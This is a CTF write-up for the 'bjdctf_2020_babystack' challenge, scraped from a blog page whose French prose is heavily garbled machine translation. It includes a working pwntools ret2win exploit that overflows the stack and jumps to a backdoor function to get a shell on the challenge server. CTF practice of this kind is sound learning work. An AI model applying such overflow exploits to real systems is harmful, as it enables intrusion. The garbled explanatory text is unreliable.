当前位置:网站首页>Bjdctf 2020 Bar _ Babystack
Bjdctf 2020 Bar _ Babystack
2022-06-24 07:22:00 【[mzq]】
bjdctf_2020_babystack

checksec Un instant. 64Programme bit Je n'ai rien ouvert ,idaRegardez le programme
mainFonctions
Qu'en penses - tu?readLecture de la fonction0Chaîne (s),J'ai lu "solitude".,scanfNi déborder,On dirait qu'il n'y a pas de problème
MaisscanfUn nombre entré par l'utilisateur est lu et attribué ànbytes ,Et puisreadVa lirenbytesTaille des caractères,C'est - à - dire que nous pouvons déborder n'importe quelle longueur
backdoorFonctions
Lancez cette fonction pour obtenirshell
exp
ret C'est pour équilibrer la pile En fait backdoor Après la fonction +1Ça marche.
from pwn import *
io = process("./bjdctf_2020_babystack")
io = remote("node4.buuoj.cn",29159)
elf = ELF("./bjdctf_2020_babystack")
context(log_level="debug",arch="amd64")
backdoor = elf.symbols["backdoor"]
ret = 0x0000000000400561
print backdoor
io.sendlineafter(b"Please input the length of your name:","100")
payload = "a"*16 + "b"*8 + p64(ret) + p64(backdoor)
payload = flat(["a"*16,"b"*8,ret,backdoor])
io.sendlineafter("What's u name?",payload)
io.interactive()

边栏推荐
- On update current in MySQL_ TIMESTAMP
- [security] how to [host security - hybrid cloud version] support secure access to non Tencent virtual machines
- 【帧率倍频】基于FPGA的视频帧率倍频系统verilog开发实现
- 现货黄金有哪些眩人的小技术?
- 【Proteus】Arduino UNO + DS1307+LCD1602时间显示
- 关于取模数据序号定位的说明 区码定位是指GBK编码
- Spark项目打包优化实践
- PCL 计算多边形的面积
- JVM debugging tool -jps
- Spark project Packaging Optimization Practice
猜你喜欢

Prefix and topic training

学会使用楼宇控制系统BACnet网关没那么难

2022蓝队HW初级面试题总结

关于取模数据序号定位的说明 区码定位是指GBK编码
![[WUSTCTF2020]爬](/img/b6/4a0582144c3125e7a0666bbbbfe29d.png)
[WUSTCTF2020]爬

What is the mentality of spot gold worth learning from

Huawei cloud image engine service

【图像融合】基于伪 Wigner 分布 (PWD) 实现图像融合附matlab代码

. Net7 miniapi (special part):preview5 optimizes JWT verification (Part 1)

在终端pip install xxx但在pycharm却no module named xxx
随机推荐
C: use of mutex
How to distinguish PAAS, IAAs and SaaS?
Are internal consultants and external consultants in SAP implementation projects difficult or successful? [English version]
0 foundation a literature club low code development member management applet (4)
Canal installation configuration
Laravel document reading notes -laravel str slug() function example
第三方软件测试公司如何选择?2022国内软件测试机构排名
The third session of freshman engineering education seminar is under registration
JVM debugging tool -jps
Cisco router configuration notes: static routing, rip, OSPF, principles combined with experiments, worth a visit!
学会使用楼宇控制系统BACnet网关没那么难
RDD基础知识点
Spark project Packaging Optimization Practice
【图像融合】基于NSST结合PCNN实现图像融合附matlab代码
buuctf misc 从娃娃抓起
华为云图引擎服务
[DDCTF2018](╯°□°)╯︵ ┻━┻
Huawei experimental topology set, learning methods are attached at the end of the article!
在终端pip install xxx但在pycharm却no module named xxx
Functions in setinterval cannot have parentheses